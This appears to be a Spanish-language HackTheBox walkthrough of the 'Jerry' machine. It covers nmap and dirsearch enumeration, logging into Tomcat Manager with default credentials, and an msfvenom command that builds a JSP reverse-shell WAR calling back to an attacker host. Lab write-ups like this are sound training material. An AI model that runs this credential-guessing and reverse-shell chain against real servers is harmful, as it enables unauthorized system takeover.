🟢Jerry

Jerry es posiblemente la caja más fácil en HackTheBox. Hay una instalación de Tomcat con una contraseña predeterminada para el Administrador de aplicaciones web. Lo usaré para cargar un archivo WAR, que devuelve un shell del sistema y acceso a ambas banderas.

Enumeración

NMAP

Comenzamos realizando un escaneo rápido de los puertos que tiene abiertos la máquina víctima.

nmap -p- --open -vvv -Pn -n --min-rate 2000 10.10.10.95

Únicamente está abierta el puerto 8080 TCP en la máquina objetivo.

nmap -p8080 -sVC -vv 10.10.10.95

Un servicio abierto:

• Puerto 8080 -> Apache Tomcat JSP Engine 1.1

Enumeración web

Vamos a ver el contenido del puerto 8080 en el navegador web.

Vemos una página por defecto de un servidor Apache Tomcat.

El siguiente paso, realizar una enumeración de directorios. Para ello, vamos a utilizar la herramienta dirsearch.

dirsearch -u "http://10.10.10.95:8080/" -w '/home/kali/SecLists/Discovery/Web-Content/ApacheTomcat.fuzz.txt' -r

Después de investigar cada uno de los resultados anteriores, el más interesante es el directorio /manager, que nos pide credenciales para iniciar sesión. Vamos a comenzar con las credenciales por defecto por excelencia admin/admin.

Con las credenciales admin/admin, tenemos acceso denegado. Si analizamos un poco el resutlado devuelto, podemos ver las credenciales por defecto de Apache Tomcat. Vamos a probar de nuevo con estas credenciales.

Accedemos al gestor del servidor Apache Tomcat. Vamos a investigar un poco en busca de posibles puntos vulnerables.

Elevación de privilegios

Para obtener un shell, vamos a utilizar la sección "WAR file to deploy" de la aplicación del administrador.

Un archivo de recursos de aplicaciones web (WAR) es un contenedor de un solo archivo que contiene todos los archivos potenciales necesarios para una aplicación web basada en Java. Puede tener archivos de Java (.jar), páginas de servidor de Java (.jsp), servlets de Java, clases de Java, páginas web, css, etc.

Tomcat Manager facilita la implementación de archivos WAR con un par de clics y, dado que estos pueden contener código Java, es un excelente objetivo para lograr la ejecución.

Crear archivo WAR

Vamos a utilziar msfvenom para crear un shell inverso de Windows que pueda ser capturado con netcat.

La creamos de la siguiente manera:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f war > securiters.warUna vez creado el archivo, procedemos a subirlo al servidor y al mismo, tiempo habilitamos un oyente en el puerto que hayamos habilitado en el archivo malicioso creado.

El siguiente paso será por un lado, ejecutar el archivo creado en el navegador y por otro lado habilitar un oyente en el puerto habilitado en el archivo malicioso.

Obtenemos shell como administradores, ya solo nos falta buscar ambas flags. Ambas flags se encuentran en el directorio

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"

Ya tendriamos el CTF Jerry de HTB acabado.